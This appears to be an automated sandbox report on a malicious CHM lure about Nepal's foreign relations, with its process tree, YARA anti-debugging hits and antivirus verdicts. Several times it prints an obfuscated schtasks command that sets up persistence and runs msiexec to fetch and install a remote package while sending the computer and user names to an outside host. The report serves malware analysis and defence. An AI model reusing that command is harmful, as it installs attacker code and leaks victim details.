Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 9, 2023, 5:15 p.m. | Aug. 9, 2023, 5:17 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "gGYcLv" "C:\Users\test22\AppData\Local\Temp\Nepal Relation with European Countries.chm"
2640-
hh.exe "C:\Windows\hh.exe" C:\Users\test22\AppData\Local\Temp\Nepal Relation with European Countries.chm
2760-
schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
2952
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f |
cmdline | schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f |
cmdline | schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f |
cmdline | schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f |
Lionic | Trojan.HTML.Generic.4!c |
MicroWorld-eScan | Trojan.GenericKD.67693476 |
FireEye | Trojan.GenericKD.67693476 |
CAT-QuickHeal | Trojan.HTML.Bitter.47423 |
VIPRE | Trojan.GenericKD.67693476 |
Sangfor | Trojan.Generic-Script.Save.aadd533b |
Arcabit | Trojan.Generic.D408EBA4 |
Cyren | CHM/ABRisk.ZYUM-7 |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | HTML/TrojanDownloader.Agent.NKU |
TrendMicro-HouseCall | Trojan.Win32.FRS.VSNW0EG23 |
Avast | Other:Malware-gen [Trj] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.GenericKD.67693476 |
Tencent | Win32.Trojan-Downloader.Ader.Eflw |
Emsisoft | Trojan.GenericKD.67693476 (B) |
DrWeb | Exploit.ActiveX.23 |
TrendMicro | Trojan.Win32.FRS.VSNW0EG23 |
McAfee-GW-Edition | Artemis!Trojan |
Microsoft | Trojan:Win32/Leonem |
ZoneAlarm | HEUR:Trojan.Script.Generic |
GData | Trojan.GenericKD.67693476 |
Detected | |
AhnLab-V3 | Downloader/HTML.Generic.S2220 |
ALYac | Trojan.Downloader.CHM |
Rising | Trojan.MouseJack/HTML!1.BE26 (CLASSIC) |
MAX | malware (ai score=100) |
Fortinet | HTML/Agent.NKU!tr.dldr |
AVG | Other:Malware-gen [Trj] |